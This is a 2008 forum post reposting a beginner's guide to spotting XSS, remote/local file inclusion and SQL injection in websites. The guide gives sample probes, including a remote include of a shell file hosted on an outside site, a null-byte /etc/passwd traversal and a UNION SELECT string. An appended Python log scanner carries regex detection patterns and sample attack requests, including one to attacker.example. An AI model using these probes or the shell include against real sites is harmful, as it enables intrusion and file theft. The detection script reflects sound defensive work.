Republic of Paka


Posted by x0x.kdjfs on May 10, 2008

Web Apps Vulnerabilities Break Down

Taken from DarkMindZ. Such a good intro.

[ How to find vulnerabilities in websites | The Newbie Guide ]

[+] XSS :
|
|- Definition: Cross Site Scripting.
|
|- Technical Definition: Injecting HTML in a page. Permanent or not.
|
|- Example:
|
| <script>alert("XSS")</script>
|
|- Where is it found:
|
| [ Search Engines ] || [ GET Variables ] || [ Different Forms ]
|
|- Spotting it:
|
| [ Search Engines ]
|
| If the search term you input is output on the page, the chances are
| it is vulnerable.
|
| [ GET Variables ]
|
| If the GET var is output on the page, it is most likely that
| the site is vulnerable. Checking for hidden tags is also helpful;
| sometimes the GET var is stored in a hidden tag to be used later.
|
| [ Different Forms ]
|
| Login forms, or any input form you can find on a site, could be
| vulnerable; check it by checking whether the input is output.
|
|__________________________________________________________________
|
|
|
[+] RFI / LFI :
|
| - Definition: Remote File Inclusion | Local File Inclusion.
|
| - Technical Definition:
| [ RFI ] Execution of a remote script on a target server,
| by including it.
| [ LFI ] Execution, or disclosure of files, that are on the same
| target server.
|
| - Example:
|
| [ RFI ] ?page=http://www.darkmindz.com/shell/x2300.txt?
|
| [ LFI ] ?page=../../../../etc/passwd
|
| - Where is it found:
| [ GET Variables ]
|
| - Spotting it:
|
| [ GET Variables ]
|
| It is mostly common sense: if you see the main page redirecting to other pages by a GET var, it is most likely vulnerable.
| Sometimes it might be hiding behind an integer; you can spot it by changing that GET var to anything else, and if you see any main(); errors,
| it is vulnerable.
| A common way to bypass some extension restrictions is to null-byte the extension, by:
|
| ?page=../../../../etc/passwd%00
|
|______________________________________________________________________
|
|
|
[+] SQL Injection :
|
| - Definition: [ the name says it all ]
|
| - Technical definition: Injecting SQL to echo out data from other tables / rows, etc.
|
| - Example:
|
| ?id=-- UNION SELECT ALL FROM USERS /*
|
| - Where is it found:
|
| [ GET Variables ] || [ Login Forms ] || [ Search Engine ] || [ Different Forms ]
|
| - Spotting it:
|
| [ GET variables ]
|
| Most of the time, it is an integer that we are looking for in a GET var, for example: ' ?id=123 ' ' ?cat=22 ' etc.
| If we change that integer to a quote or anything else, we could get a MySQL error; then we know that this site might be vulnerable.
|
| [ Login Forms ]
|
| We can try to inject a normal SQL injection in a login form, because most login forms pass through a SQL query to check for data.
|
| [ Search Engine ]
|
| The same applies here: most search engines look for the info in a SQL DB. We can always inject that.
|
| [ Different Forms ]
|
| The general rule applies: you can try a random SQL injection with a different quote style to see whether it shows any errors or not.
|
|______________________________________________________________________
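As an added example (not part of the original guide or of DarkMindZ), the following Python script shows the defender's side of the same four classes: it scans web-server access-log lines for the probe shapes described above (reflected script tags, `../` traversal with a trailing null byte, a remote URL in an include parameter, and UNION SELECT fragments) after URL-decoding each parameter value. The log lines, IP addresses and the attacker.example host are constructed for the demo.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed sample access-log lines (combined-log style); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/May/2008:12:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 512
10.0.0.5 - - [10/May/2008:12:00:02 +0000] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 3120
10.0.0.9 - - [10/May/2008:12:00:03 +0000] "GET /search.php?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 944
10.0.0.9 - - [10/May/2008:12:00:04 +0000] "GET /news.php?id=1%20UNION%20SELECT%20ALL%20FROM%20users/* HTTP/1.1" 500 210
10.0.0.7 - - [10/May/2008:12:00:05 +0000] "GET /index.php?page=http://attacker.example/shell.txt? HTTP/1.1" 200 50
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# One heuristic per class from the guide; each runs on the decoded value,
# so %00, %2e%2e and %3C-style encodings are caught as well as plain text.
CHECKS = {
    "xss": re.compile(r"<\s*script\b|on\w+\s*=|javascript:", re.I),
    "lfi": re.compile(r"(\.\./|\.\.\\)|\x00"),
    "rfi": re.compile(r"^(https?|ftp)://", re.I),
    "sqli": re.compile(r"\bunion\b[\s/*]+\bselect\b|['\"]\s*(or|and)\b|/\*|--\s", re.I),
}


def classify_value(value):
    """Return the set of probe classes a raw parameter value matches."""
    # parse_qsl already decoded once; decoding twice more also catches
    # double-encoded probes such as %252e%252e.
    decoded = unquote(unquote(value))
    return {name for name, rx in CHECKS.items() if rx.search(decoded)}


def scan_log(text):
    """Return (client_ip, param_name, classes) for each suspicious parameter."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a request line we understand
        ip = line.split(" ", 1)[0]
        query = urlsplit(m.group(1)).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            classes = classify_value(value)
            if classes:
                hits.append((ip, name, classes))
    return hits


if __name__ == "__main__":
    for ip, name, classes in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{name}\t{','.join(sorted(classes))}")
```

These regexes are deliberately broad (a search term containing "on something=" will trip the xss check), so treat hits as triage candidates to review, not as confirmed attacks.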
